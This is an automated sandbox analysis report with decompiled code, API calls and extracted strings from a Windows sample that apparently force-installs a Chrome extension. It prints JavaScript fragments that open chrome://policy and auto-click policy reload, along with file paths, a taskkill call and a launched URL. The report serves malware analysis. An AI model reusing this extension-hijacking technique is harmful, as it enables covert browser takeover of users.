                                                                                                control_flow_graph 731 10015bc 732 10015be 731->732 733 10015bf-10015c6 731->733 732->732 734 1001605 733->734 735 10015c8 733->735 736 1001607 734->736 737 100160a-1001625 call 1002b10 734->737 738 10015ca 735->738 739 10015cd-10015f4 call 1001000 WriteFile 735->739 736->737 740 1001609 736->740 746 1001627 737->746 747 100162a-1001650 CreateFileW 737->747 738->739 742 10015cc 738->742 748 10015f6 739->748 749 10015f8-10015ff CloseHandle 739->749 740->737 742->739 746->747 750 1001629 746->750 751 1001652 747->751 752 1001654-100165b 747->752 748->749 749->734 750->747 751->752 753 100169a 752->753 754 100165d 752->754 757 100169c 753->757 758 100169f-10016b9 call 1002b10 753->758 755 1001662-1001688 call 1001000 WriteFile 754->755 756 100165f 754->756 765 100168a 755->765 766 100168d-1001694 CloseHandle 755->766 756->755 759 1001661 756->759 757->758 761 100169e 757->761 767 10016bb 758->767 768 10016be-10016e3 CreateFileW 758->768 759->755 761->758 765->766 772 100168c 765->772 766->753 767->768 769 10016bd 767->769 770 10016e5 768->770 771 10016e8-10016ef 768->771 769->768 770->771 773 10016e7 770->773 774 10016f1 771->774 775 100172e-100173b call 1002b7c 771->775 772->766 773->771 776 10016f3 774->776 777 10016f6-100171c call 1001000 WriteFile 774->777 776->777 779 10016f5 776->779 783 1001721-1001728 CloseHandle 777->783 784 100171e 777->784 779->777 783->775 784->783 785 1001720 784->785 785->783
                                                                                                C-Code - Quality: 82%
                                                                                                			E010015BC(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                				void* _t44;
                                                                                                				void* _t45;
                                                                                                				void* _t56;
                                                                                                				void* _t57;
                                                                                                				void* _t58;
                                                                                                				void* _t65;
                                                                                                
                                                                                                				_t57 = __esi;
                                                                                                				_t56 = __edi;
                                                                                                				_t45 = __ecx;
                                                                                                				_t44 = __ebx;
                                                                                                				if(__eflags == 0) {
                                                                                                				}
                                                                                                				_t65 =  *((intOrPtr*)(_t58 - 0x218)) - 0xffffffff;
                                                                                                				_push( *((intOrPtr*)(_t58 + _t56 + 0x7e)));
                                                                                                			}









                                                                                                0x010015bc
                                                                                                0x010015bc
                                                                                                0x010015bc
                                                                                                0x010015bc
                                                                                                0x010015bc
                                                                                                0x010015bc
                                                                                                0x010015bf
                                                                                                0x010015c5

                                                                                                APIs
                                                                                                • WriteFile.KERNELBASE(000000FF,00000000,00000140,00000000,00000000), ref: 010015ED
                                                                                                Strings
                                                                                                • %s\ServiceApp\apps-helper\edge.crx, xrefs: 010016A5
                                                                                                • %s\ServiceApp\apps-helper\web.js, xrefs: 01001611
                                                                                                • addEventListener('load', () => {if (location.host !== 'policy') return;const reload = () => {const button = document.querySelector('#reload-policies');if (button) {button.click();setTimeout(close, 200);} else {setTimeout(re, xrefs: 01001670
                                                                                                • chrome.management.onInstalled.addListener(info => {if (info.id != 'ecffbknobglofafinobbcmaionnihcma') return;setTimeout(() => {chrome.tabs.create({ url: 'chrome://policy' }, tab => {chrome.scripting.executeScript({target: { tabId: tab.id, xrefs: 010015DB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileWrite
                                                                                                • String ID: %s\ServiceApp\apps-helper\edge.crx$%s\ServiceApp\apps-helper\web.js$addEventListener('load', () => {if (location.host !== 'policy') return;const reload = () => {const button = document.querySelector('#reload-policies');if (button) {button.click();setTimeout(close, 200);} else {setTimeout(re$chrome.management.onInstalled.addListener(info => {if (info.id != 'ecffbknobglofafinobbcmaionnihcma') return;setTimeout(() => {chrome.tabs.create({ url: 'chrome://policy' }, tab => {chrome.scripting.executeScript({target: { tabId: tab.id
                                                                                                • API String ID: 3934441357-3213518862
                                                                                                • Opcode ID: af68339d9a4384d69162dd3e6465b0414f102784399206551db06509b546b75f
                                                                                                • Instruction ID: 6f270ae8de8de5ae43653a32d472acc9a3a4e4b29c3b42c082445d69b0c786c7
                                                                                                • Opcode Fuzzy Hash: af68339d9a4384d69162dd3e6465b0414f102784399206551db06509b546b75f
                                                                                                • Instruction Fuzzy Hash: 8741BA70640304A7F7B39BAC9C49FE937A46728731F1807C8F2F5A60D1DAB5D5818B55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 786 1001330-1001348 787 100134a 786->787 788 100134e-1001365 call 1007be0 786->788 787->788 790 100134c 787->790 792 1001367 788->792 793 100136a-100139a CreateProcessW 788->793 790->788 792->793 794 1001369 792->794 795 100139c 793->795 796 100139f-10013a3 793->796 794->793 795->796 797 100139e 795->797 798 10013a5-10013a7 796->798 799 10013ab-10013ac 796->799 797->796 800 1001405-100140f 798->800 801 10013b0-10013bc WaitForSingleObject 799->801 802 10013ae 799->802 803 10013c2-10013d3 GetExitCodeProcess 801->803 804 10013be 801->804 802->801 806 10013d5 803->806 807 10013d8-10013ec CloseHandle * 2 803->807 804->803 805 10013c0 804->805 805->803 806->807 808 10013d7 806->808 809 10013f1-10013f5 807->809 810 10013ee 807->810 808->807 812 10013f7-10013f9 809->812 813 10013fb 809->813 810->809 811 10013f0 810->811 811->809 812->800 814 1001400-1001404 813->814 815 10013fd 813->815 814->800 815->814 816 10013ff call 10015bc 815->816 816->814
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 0100135D
                                                                                                • CreateProcessW.KERNELBASE(c:\windows\system32\taskkill.exe,?,00000000,00000000,00000000,08000020,00000000,00000000,00000044,00000000), ref: 01001391
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateProcess_memset
                                                                                                • String ID: D$c:\windows\system32\taskkill.exe
                                                                                                • API String ID: 1177741608-2254422676
                                                                                                • Opcode ID: 74b14b02b62416469ceab4c7b470971282792ef4d0c141f0081e53588bfd1943
                                                                                                • Instruction ID: 7710bbbdb33104f559697e82d13988023b9f500867b7ded415fb49216fa4f8a1
                                                                                                • Opcode Fuzzy Hash: 74b14b02b62416469ceab4c7b470971282792ef4d0c141f0081e53588bfd1943
                                                                                                • Instruction Fuzzy Hash: D031E3B5D04349DBFB63DBE89804BAD7FB4AB14310F04C699E690AE5C6DA74D005CB22
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1011 1002ced-1002cff 1012 1002d01-1002d1b call 10040ce call 10043bb 1011->1012 1013 1002d1d-1002d35 call 100337a call 10041ea 1011->1013 1022 1002d99-1002d9c 1012->1022 1023 1002d81-1002d8b call 1004117 1013->1023 1024 1002d37-1002d59 call 1003568 call 1003408 1013->1024 1029 1002d96 1023->1029 1030 1002d8d-1002d95 call 10040f4 1023->1030 1035 1002d5b 1024->1035 1036 1002d5e-1002d76 CreateThread 1024->1036 1033 1002d98 1029->1033 1030->1029 1033->1022 1035->1036 1036->1033 1038 1002d78-1002d7e GetLastError 1036->1038 1038->1023
                                                                                                C-Code - Quality: 73%
                                                                                                			E01002CED(void* __edx, void* __esi, struct _SECURITY_ATTRIBUTES* _a4, long _a8, char _a12, intOrPtr _a16, long _a20, DWORD* _a24) {
                                                                                                				DWORD* _v8;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __ebp;
                                                                                                				void* _t20;
                                                                                                				DWORD* _t25;
                                                                                                				intOrPtr* _t27;
                                                                                                				char _t41;
                                                                                                				void* _t44;
                                                                                                
                                                                                                				_t41 = _a12;
                                                                                                				_v8 = 0;
                                                                                                				_t48 = _t41;
                                                                                                				if(_t41 != 0) {
                                                                                                					_push(__esi);
                                                                                                					E0100337A();
                                                                                                					_t44 = E010041EA(1, 0x214);
                                                                                                					__eflags = _t44;
                                                                                                					if(__eflags == 0) {
                                                                                                						L7:
                                                                                                						_push(_t44);
                                                                                                						E01004117(0, _t41, _t44, __eflags);
                                                                                                						__eflags = _v8;
                                                                                                						if(_v8 != 0) {
                                                                                                							E010040F4(_v8);
                                                                                                						}
                                                                                                						_t20 = 0;
                                                                                                						__eflags = 0;
                                                                                                					} else {
                                                                                                						_push( *((intOrPtr*)(E01003568(0, __edx, _t41, __eflags) + 0x6c)));
                                                                                                						_push(_t44);
                                                                                                						E01003408(0, _t41, _t44, __eflags);
                                                                                                						 *(_t44 + 4) =  *(_t44 + 4) | 0xffffffff;
                                                                                                						 *((intOrPtr*)(_t44 + 0x58)) = _a16;
                                                                                                						_t25 = _a24;
                                                                                                						 *((intOrPtr*)(_t44 + 0x54)) = _t41;
                                                                                                						__eflags = _t25;
                                                                                                						if(_t25 == 0) {
                                                                                                							_t25 =  &_a12;
                                                                                                						}
                                                                                                						_t20 = CreateThread(_a4, _a8, E01002C6A, _t44, _a20, _t25); // executed
                                                                                                						__eflags = _t20;
                                                                                                						if(__eflags == 0) {
                                                                                                							_v8 = GetLastError();
                                                                                                							goto L7;
                                                                                                						}
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t27 = E010040CE(_t48);
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					 *_t27 = 0x16;
                                                                                                					E010043BB(__edx, _t41, __esi);
                                                                                                					_t20 = 0;
                                                                                                				}
                                                                                                				return _t20;
                                                                                                			}












                                                                                                0x01002cf5
                                                                                                0x01002cfa
                                                                                                0x01002cfd
                                                                                                0x01002cff
                                                                                                0x01002d1d
                                                                                                0x01002d1e
                                                                                                0x01002d2f
                                                                                                0x01002d33
                                                                                                0x01002d35
                                                                                                0x01002d81
                                                                                                0x01002d81
                                                                                                0x01002d82
                                                                                                0x01002d88
                                                                                                0x01002d8b
                                                                                                0x01002d90
                                                                                                0x01002d95
                                                                                                0x01002d96
                                                                                                0x01002d96
                                                                                                0x01002d37
                                                                                                0x01002d3c
                                                                                                0x01002d3f
                                                                                                0x01002d40
                                                                                                0x01002d48
                                                                                                0x01002d4c
                                                                                                0x01002d4f
                                                                                                0x01002d54
                                                                                                0x01002d57
                                                                                                0x01002d59
                                                                                                0x01002d5b
                                                                                                0x01002d5b
                                                                                                0x01002d6e
                                                                                                0x01002d74
                                                                                                0x01002d76
                                                                                                0x01002d7e
                                                                                                0x00000000
                                                                                                0x01002d7e
                                                                                                0x01002d76
                                                                                                0x01002d01
                                                                                                0x01002d01
                                                                                                0x01002d06
                                                                                                0x01002d07
                                                                                                0x01002d08
                                                                                                0x01002d09
                                                                                                0x01002d0a
                                                                                                0x01002d0b
                                                                                                0x01002d11
                                                                                                0x01002d19
                                                                                                0x01002d19
                                                                                                0x01002d9c

                                                                                                APIs
                                                                                                • ___set_flsgetvalue.LIBCMT ref: 01002D1E
                                                                                                • __calloc_crt.LIBCMT ref: 01002D2A
                                                                                                • __getptd.LIBCMT ref: 01002D37
                                                                                                • CreateThread.KERNELBASE(?,?,01002C6A,00000000,?,?), ref: 01002D6E
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 01002D78
                                                                                                • __dosmaperr.LIBCMT ref: 01002D90
                                                                                                  • Part of subcall function 010040CE: __getptd_noexit.LIBCMT ref: 010040CE
                                                                                                  • Part of subcall function 010043BB: __decode_pointer.LIBCMT ref: 010043C6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                                                • String ID:
                                                                                                • API String ID: 1803633139-0
                                                                                                • Opcode ID: e496377d8e43db31dc8b80ad3b678ccb303e4a2ebe39902c10e60fc053edf1f1
                                                                                                • Instruction ID: 90b992d60a816d0540b239417abf5cb62da5be642cc7500543ed5617e4ada9f3
                                                                                                • Opcode Fuzzy Hash: e496377d8e43db31dc8b80ad3b678ccb303e4a2ebe39902c10e60fc053edf1f1
                                                                                                • Instruction Fuzzy Hash: 3E11B27250020AAFFB23BFA8DC858DE7BE5FF10260F10406AF685E61D0DB719A41C7A0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1039 100175a-1001785 SHGetSpecialFolderPathW 1042 100178b-10017aa 1039->1042 1042->1042 1043 10017ac-1001b75 call 1002b10 GetFileAttributesW RegOpenKeyExW * 5 ShellExecuteW Sleep call 1002b10 FindFirstFileW call 1002b10 GetFileAttributesW 1042->1043 1072 1001b7b-1001c83 call 1002b60 FindNextFileW 1043->1072 1077 1001c89-1001e3c call 1002b10 * 2 call 1001270 * 5 call 1001330 Sleep 1072->1077 1109 1001e4d-1001e59 1077->1109 1110 1001ed2-1001edd Sleep 1109->1110 1111 1001e5b 1109->1111 1114 1001ee2-1001efc call 1001270 1110->1114 1115 1001edf 1110->1115 1112 1001e60-1001e8f call 1002b10 1111->1112 1113 1001e5d 1111->1113 1122 1001e91 1112->1122 1123 1001e94-1001e9b 1112->1123 1113->1112 1116 1001e5f 1113->1116 1124 1001f00-1001f30 call 1001270 Sleep call 1001330 1114->1124 1125 1001efe 1114->1125 1115->1114 1118 1001ee1 1115->1118 1116->1112 1118->1114 1122->1123 1127 1001e93 1122->1127 1128 1001ecd 1123->1128 1129 1001e9d 1123->1129 1143 1001f35 1124->1143 1125->1124 1132 1002050-1002058 1127->1132 1128->1109 1133 1001ea2-1001eb2 GetFileAttributesW 1129->1133 1134 1001e9f 1129->1134 1135 100205a-1002070 1132->1135 1136 100207e-1002083 1132->1136 1139 1001eb4 1133->1139 1140 1001ebb 1133->1140 1134->1133 1138 1001ea1 1134->1138 1141 1002072-100207c 1135->1141 1142 1002018-1002031 1135->1142 1146 1002089-100209c 1136->1146 1138->1133 1147 1001eb6 1139->1147 1148 1001eb9 1139->1148 1144 1001ec0-1001ecb Sleep 1140->1144 1145 1001ebd 1140->1145 1141->1146 1142->1136 1155 1002033-100203b 1142->1155 1150 1001f37 1143->1150 1151 1001f3b-1001f4a call 1002b7c 1143->1151 1144->1123 1145->1144 1152 1001ebf 1145->1152 1153 10020a2-10020b2 1146->1153 1154 100215f-1002175 FindNextFileW 1146->1154 1147->1148 1149 1001eb8 1147->1149 1148->1128 1149->1148 1150->1151 1156 1001f39 1150->1156 1152->1144 1157 10020b8-10020d1 1153->1157 1159 1001ff5-1001ffc 1154->1159 1160 100217b-10021df FindClose call 1007be0 call 1002b10 GetFileAttributesW 1154->1160 1155->1141 1161 100203d-100204e 1155->1161 1156->1151 1162 10020d3-10020db 1157->1162 1163 100211e-1002123 1157->1163 1159->1154 1166 1002002-1002012 1159->1166 1182 10021ed-1002554 RegOpenKeyExW * 5 ShellExecuteW Sleep call 1002b10 FindFirstFileW call 1002b10 GetFileAttributesW 1160->1182 1161->1132 1167 1002112-100211c 1162->1167 1168 10020dd-10020f8 1162->1168 1170 1002129-100213c 1163->1170 1166->1142 1167->1170 1168->1163 1172 10020fa-1002110 1168->1172 1170->1154 1173 100213e 1170->1173 1172->1157 1172->1167 1175 1002140 1173->1175 1176 1002144-100215a call 1002b40 1173->1176 1175->1176 1178 1002142 1175->1178 1176->1154 1187 100215c 1176->1187 1178->1176 1211 1002559-1002670 call 1002b60 FindNextFileW 1182->1211 1187->1154 1189 100215e 1187->1189 1189->1154 1216 1002676-100281e call 1002b10 * 2 call 1001270 * 5 call 1001330 Sleep 1211->1216 1247 100282f-100283b 1216->1247 1248 10028b9 1247->1248 1249 100283d-100283e 1247->1249 1252 10028bb 1248->1252 1253 10028be-10028ca Sleep 1248->1253 1250 1002840 1249->1250 1251 1002842-1002871 call 1002b10 1249->1251 1250->1251 1261 1002873 1251->1261 1262 1002876-10028b4 1251->1262 1252->1253 1255 10028bd 1252->1255 1256 10028cc 1253->1256 1257 10028ce-1002900 call 1001270 * 2 1253->1257 1255->1253 1256->1257 1269 1002902 1257->1269 1270 1002906-1002912 Sleep 1257->1270 1261->1262 1264 1002875 call 1002a33 1261->1264 1262->1247 1264->1262 1269->1270 1271 1002904 1269->1271 1272 1002914 1270->1272 1273 1002916-1002928 call 1001330 1270->1273 1271->1270 1272->1273 1276 100292a 1273->1276 1277 100292c-100293b call 1002b7c 1273->1277 1276->1277
                                                                                                C-Code - Quality: 100%
                                                                                                			E0100175A(void* __eax, void* __ebx, void* __edi, void* __esi) {
                                                                                                				void* _t453;
                                                                                                				void* _t565;
                                                                                                				void* _t566;
                                                                                                				void* _t568;
                                                                                                				void* _t584;
                                                                                                
                                                                                                				_t566 = __esi;
                                                                                                				_t565 = __edi;
                                                                                                				_t453 = __ebx;
                                                                                                				_t584 = __eax + _t568;
                                                                                                			}








                                                                                                0x0100175a
                                                                                                0x0100175a
                                                                                                0x0100175a
                                                                                                0x0100175a

                                                                                                APIs
                                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,C:\Program Files,00000026,00000000), ref: 01001767
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd
                                                                                                Similarity
                                                                                                • API ID: FolderPathSpecial
                                                                                                • String ID: %s\Google\Chrome\Application\chrome.exe$C:\Program Files
                                                                                                • API String ID: 994120019-946050236
                                                                                                • Opcode ID: bc115ef6e721e9d0767a3c7e69ee7e8e3dec9b01b87d58924e142b67e280f49e
                                                                                                • Instruction ID: bd1d50518dd869436248df4dd4ab4daa1da05a6908f8ed8e7edd735257cbfaf4
                                                                                                • Opcode Fuzzy Hash: bc115ef6e721e9d0767a3c7e69ee7e8e3dec9b01b87d58924e142b67e280f49e
                                                                                                • Instruction Fuzzy Hash: 991181F1A046189BEB77DF69DC056ACB3B8FB14324F0007D8E5AD661C1D6798B85CB04
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1281 1001a1a-1001a23 1283 1001a25 1281->1283 1284 1001a27-1001b75 ShellExecuteW Sleep call 1002b10 FindFirstFileW call 1002b10 GetFileAttributesW 1281->1284 1283->1284 1295 1001b7b-1001c83 call 1002b60 FindNextFileW 1284->1295 1300 1001c89-1001e3c call 1002b10 * 2 call 1001270 * 5 call 1001330 Sleep 1295->1300 1332 1001e4d-1001e59 1300->1332 1333 1001ed2-1001edd Sleep 1332->1333 1334 1001e5b 1332->1334 1337 1001ee2-1001efc call 1001270 1333->1337 1338 1001edf 1333->1338 1335 1001e60-1001e8f call 1002b10 1334->1335 1336 1001e5d 1334->1336 1345 1001e91 1335->1345 1346 1001e94-1001e9b 1335->1346 1336->1335 1339 1001e5f 1336->1339 1347 1001f00-1001f30 call 1001270 Sleep call 1001330 1337->1347 1348 1001efe 1337->1348 1338->1337 1341 1001ee1 1338->1341 1339->1335 1341->1337 1345->1346 1350 1001e93 1345->1350 1351 1001ecd 1346->1351 1352 1001e9d 1346->1352 1366 1001f35 1347->1366 1348->1347 1355 1002050-1002058 1350->1355 1351->1332 1356 1001ea2-1001eb2 GetFileAttributesW 1352->1356 1357 1001e9f 1352->1357 1358 100205a-1002070 1355->1358 1359 100207e-1002083 1355->1359 1362 1001eb4 1356->1362 1363 1001ebb 1356->1363 1357->1356 1361 1001ea1 1357->1361 1364 1002072-100207c 1358->1364 1365 1002018-1002031 1358->1365 1369 1002089-100209c 1359->1369 1361->1356 1370 1001eb6 1362->1370 1371 1001eb9 1362->1371 1367 1001ec0-1001ecb Sleep 1363->1367 1368 1001ebd 1363->1368 1364->1369 1365->1359 1378 1002033-100203b 1365->1378 1373 1001f37 1366->1373 1374 1001f3b-1001f4a call 1002b7c 1366->1374 1367->1346 1368->1367 1375 1001ebf 1368->1375 1376 10020a2-10020b2 1369->1376 1377 100215f-1002175 FindNextFileW 1369->1377 1370->1371 1372 1001eb8 1370->1372 1371->1351 1372->1371 1373->1374 1379 1001f39 1373->1379 1375->1367 1380 10020b8-10020d1 1376->1380 1382 1001ff5-1001ffc 1377->1382 1383 100217b-10021df FindClose call 1007be0 call 1002b10 GetFileAttributesW 1377->1383 1378->1364 1384 100203d-100204e 1378->1384 1379->1374 1385 10020d3-10020db 1380->1385 1386 100211e-1002123 1380->1386 1382->1377 1389 1002002-1002012 1382->1389 1405 10021ed-1002554 RegOpenKeyExW * 5 ShellExecuteW Sleep call 1002b10 FindFirstFileW call 1002b10 GetFileAttributesW 1383->1405 1384->1355 1390 1002112-100211c 1385->1390 1391 10020dd-10020f8 1385->1391 1393 1002129-100213c 1386->1393 1389->1365 1390->1393 1391->1386 1395 10020fa-1002110 1391->1395 1393->1377 1396 100213e 1393->1396 1395->1380 1395->1390 1398 1002140 1396->1398 1399 1002144-100215a call 1002b40 1396->1399 1398->1399 1401 1002142 1398->1401 1399->1377 1410 100215c 1399->1410 1401->1399 1434 1002559-1002670 call 1002b60 FindNextFileW 1405->1434 1410->1377 1412 100215e 1410->1412 1412->1377 1439 1002676-100281e call 1002b10 * 2 call 1001270 * 5 call 1001330 Sleep 1434->1439 1470 100282f-100283b 1439->1470 1471 10028b9 1470->1471 1472 100283d-100283e 1470->1472 1475 10028bb 1471->1475 1476 10028be-10028ca Sleep 1471->1476 1473 1002840 1472->1473 1474 1002842-1002871 call 1002b10 1472->1474 1473->1474 1484 1002873 1474->1484 1485 1002876-10028b4 1474->1485 1475->1476 1478 10028bd 1475->1478 1479 10028cc 1476->1479 1480 10028ce-1002900 call 1001270 * 2 1476->1480 1478->1476 1479->1480 1492 1002902 1480->1492 1493 1002906-1002912 Sleep 1480->1493 1484->1485 1487 1002875 call 1002a33 1484->1487 1485->1470 1487->1485 1492->1493 1494 1002904 1492->1494 1495 1002914 1493->1495 1496 1002916-1002928 call 1001330 1493->1496 1494->1493 1495->1496 1499 100292a 1496->1499 1500 100292c-100293b call 1002b7c 1496->1500 1499->1500
                                                                                                C-Code - Quality: 31%
                                                                                                			E01001A1A(void* __eax, signed char __ebx, intOrPtr* __edi, intOrPtr __esi, void* __eflags) {
                                                                                                				void* _t249;
                                                                                                				intOrPtr _t250;
                                                                                                				long _t252;
                                                                                                				void* _t253;
                                                                                                				int _t254;
                                                                                                				intOrPtr _t255;
                                                                                                				void* _t265;
                                                                                                				signed int _t269;
                                                                                                				short _t272;
                                                                                                				signed int _t277;
                                                                                                				short _t279;
                                                                                                				long _t286;
                                                                                                				void* _t287;
                                                                                                				intOrPtr _t311;
                                                                                                				short _t340;
                                                                                                				short _t343;
                                                                                                				void* _t350;
                                                                                                				signed char _t368;
                                                                                                				void* _t376;
                                                                                                				void* _t377;
                                                                                                				intOrPtr _t381;
                                                                                                				void* _t382;
                                                                                                				void* _t390;
                                                                                                				intOrPtr _t422;
                                                                                                				void* _t429;
                                                                                                				signed int _t431;
                                                                                                				void* _t432;
                                                                                                				void* _t433;
                                                                                                				WCHAR* _t435;
                                                                                                				void* _t452;
                                                                                                				intOrPtr* _t467;
                                                                                                				intOrPtr _t468;
                                                                                                				signed int _t470;
                                                                                                				void* _t473;
                                                                                                				void* _t474;
                                                                                                				void* _t475;
                                                                                                				void* _t476;
                                                                                                				void* _t477;
                                                                                                				void* _t479;
                                                                                                				void* _t481;
                                                                                                				void* _t485;
                                                                                                				void* _t486;
                                                                                                				short _t488;
                                                                                                				void* _t489;
                                                                                                				int _t493;
                                                                                                
                                                                                                				_t485 = __eflags;
                                                                                                				_t468 = __esi;
                                                                                                				_t467 = __edi;
                                                                                                				_t368 = __ebx;
                                                                                                				 *((intOrPtr*)(__eax - 1))();
                                                                                                				asm("adc eax, 0x101d274");
                                                                                                				asm("clc");
                                                                                                				if(__eflags < 0) {
                                                                                                					0x80039912();
                                                                                                				}
                                                                                                				if(_t485 > 0 && _t485 <= 0) {
                                                                                                					0x16a1f9a();
                                                                                                				}
                                                                                                				_t369 = _t470 - 0x420;
                                                                                                				ShellExecuteW(0, L"open", _t470 - 0x420, L" https://getfiles.wiki/welcome.php", 0, 5); // executed
                                                                                                				asm("clc");
                                                                                                				if(_t485 < 0) {
                                                                                                					0x1c588339();
                                                                                                				}
                                                                                                				Sleep(0x1b58); // executed
                                                                                                				if(_t485 != 0 && _t485 == 0) {
                                                                                                				}
                                                                                                				_t422 =  *0x101d264; // 0x145f9e0
                                                                                                				E01002B10(_t369, _t470 - 0x210, L"%s\\Google\\Chrome\\User Data\\*.*", _t422);
                                                                                                				_t474 = _t473 + 0xc;
                                                                                                				if(_t485 != 0 && _t485 == 0) {
                                                                                                				}
                                                                                                				_t249 = FindFirstFileW(_t470 - 0x210, _t470 - 0xa88); // executed
                                                                                                				 *(_t470 - 0x332c) = _t249;
                                                                                                				if(_t485 != 0 && _t485 == 0) {
                                                                                                				}
                                                                                                				 *(_t470 - 0x353c) = 0;
                                                                                                				_t250 =  *0x101d264; // 0x145f9e0
                                                                                                				_t371 = _t470 - 0x210;
                                                                                                				E01002B10(_t470 - 0x210, _t470 - 0x210, L"%s\\Google\\Chrome\\User Data\\Default\\Extensions\\ecffbknobglofafinobbcmaionnihcma", _t250);
                                                                                                				_t475 = _t474 + 0xc;
                                                                                                				_t252 = GetFileAttributesW(_t470 - 0x210); // executed
                                                                                                				_t486 = _t252 - 0xffffffff;
                                                                                                				if(_t486 == 0) {
                                                                                                					if(_t486 != 0 && _t486 == 0) {
                                                                                                						0xffc8();
                                                                                                					}
                                                                                                					 *((intOrPtr*)(_t470 - 0x3764)) = L"Default";
                                                                                                					 *(_t470 - 0x3768) = _t470 +  *(_t470 - 0x353c) * 0x208 - 0x3328;
                                                                                                					 *(_t470 - 0x376c) =  *(_t470 - 0x3768);
                                                                                                					 *(_t470 - 0x353c) =  *(_t470 - 0x353c) + 1;
                                                                                                					 *(_t470 - 0x3770) =  *(_t470 - 0x376c);
                                                                                                					do {
                                                                                                						 *((short*)(_t470 - 0x3772)) =  *((intOrPtr*)( *((intOrPtr*)(_t470 - 0x3764))));
                                                                                                						 *( *(_t470 - 0x376c)) =  *((intOrPtr*)(_t470 - 0x3772));
                                                                                                						 *((intOrPtr*)(_t470 - 0x3764)) =  *((intOrPtr*)(_t470 - 0x3764)) + 2;
                                                                                                						_t371 =  &( *(_t470 - 0x376c)->dwFileAttributes);
                                                                                                						 *(_t470 - 0x376c) =  &( *(_t470 - 0x376c)->dwFileAttributes);
                                                                                                						_t488 =  *((short*)(_t470 - 0x3772));
                                                                                                					} while (_t488 != 0);
                                                                                                					if(_t488 != 0 && _t488 == 0) {
                                                                                                						0x9a02();
                                                                                                					}
                                                                                                				}
                                                                                                				if(_t488 != 0 && _t488 == 0) {
                                                                                                					0xe801();
                                                                                                				}
                                                                                                				do {
                                                                                                					if(_t488 != 0 && _t488 == 0) {
                                                                                                						0x1fa2bec();
                                                                                                					}
                                                                                                					_t253 = E01002B60(_t470 - 0xa5c, L"Profile ");
                                                                                                					_t475 = _t475 + 8;
                                                                                                					_t489 = _t253;
                                                                                                					if(_t489 != 0) {
                                                                                                						asm("clc");
                                                                                                						if(_t489 < 0) {
                                                                                                							0xa585a98c();
                                                                                                						}
                                                                                                						_t350 = _t470 - 0xa5c;
